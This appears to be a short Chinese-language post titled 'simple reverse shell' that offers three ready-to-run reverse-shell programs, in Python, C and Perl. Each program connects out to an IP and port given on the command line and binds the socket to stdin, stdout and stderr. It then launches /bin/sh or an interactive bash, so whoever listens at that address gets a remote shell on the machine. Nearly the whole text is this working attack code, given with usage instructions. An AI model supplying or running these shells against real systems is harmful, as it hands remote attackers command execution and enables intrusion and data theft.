简单的反弹shell
Python版:
#!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
author: xjump
file: reverse_tcp_shell.py
usage: python reverse_tcp_shell.py remote_ip remote_port
'''
import os,sys,socket
def main():
if len(sys.argv) < 2:
print 'Usage: python reverse_tcp_shell.py remote_ip port'
sys.exit()
socket.setdefaulttimeout(5)
ip = sys.argv[1]
port = int(sys.argv[2])
ADDR = (ip,port)
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((ADDR))
print '[+] Connect OK (%s:%s)' %(ADDR)
except:
print '[+] Connect Error (%s:%s)' %(ADDR)
sys.exit()
s.send('[+] secret knock!\n')
os.dup2(s.fileno(), sys.stderr.fileno())
os.dup2(s.fileno(), sys.stdin.fileno())
os.dup2(s.fileno(), sys.stdout.fileno())
os.system("/bin/sh")
s.close()
if __name__ == '__main__':
main()
C版:
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
void usage();
char shell[]="/bin/sh";
char cmd[]="[+] secret knock!\n";
int sclient;
int main(int argc, char *argv[]) {
if(argc <3){
usage(argv[0]);
}
struct sockaddr_in srv;
if((sclient = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Couldn't make socket!\n"); exit(-1);
}
srv.sin_family = AF_INET;
srv.sin_port = htons(atoi(argv[2]));
srv.sin_addr.s_addr = inet_addr(argv[1]);
if(connect(sclient, (struct sockaddr *)&srv, sizeof(struct sockaddr)) == -1) {
printf("[-] Could not connect to controller!\n"); exit(-1);
}
send(sclient, cmd, sizeof(cmd), 0);
dup2(sclient, 0);
dup2(sclient, 1);
dup2(sclient, 2);
execl(shell,"/bin/sh",(char *)0);
close(sclient);
return 0;
}
void usage(char *prog[]) {
printf("\t\t reverse_tcp_shell v0.1 \n\n");
printf("Usage: %s remote ip remote_port\n", prog);
exit(-1);
}
Perl版:
#!/usr/bin/perl -w
use strict;
use Socket;
use IO::Handle;
if($#ARGV+1 != 2){
print "$#ARGV $0 Remote_IP Remote_Port \n";
exit 1;
}
my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];
my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));
my $shell = '/bin/bash -i';
socket(SOCK, AF_INET, SOCK_STREAM, $proto);
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect(SOCK,$pack_addr) or die "can not connect:$!";
open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
print "Enjoy the shell.\n";
system($shell);
close SOCK;
exit 0;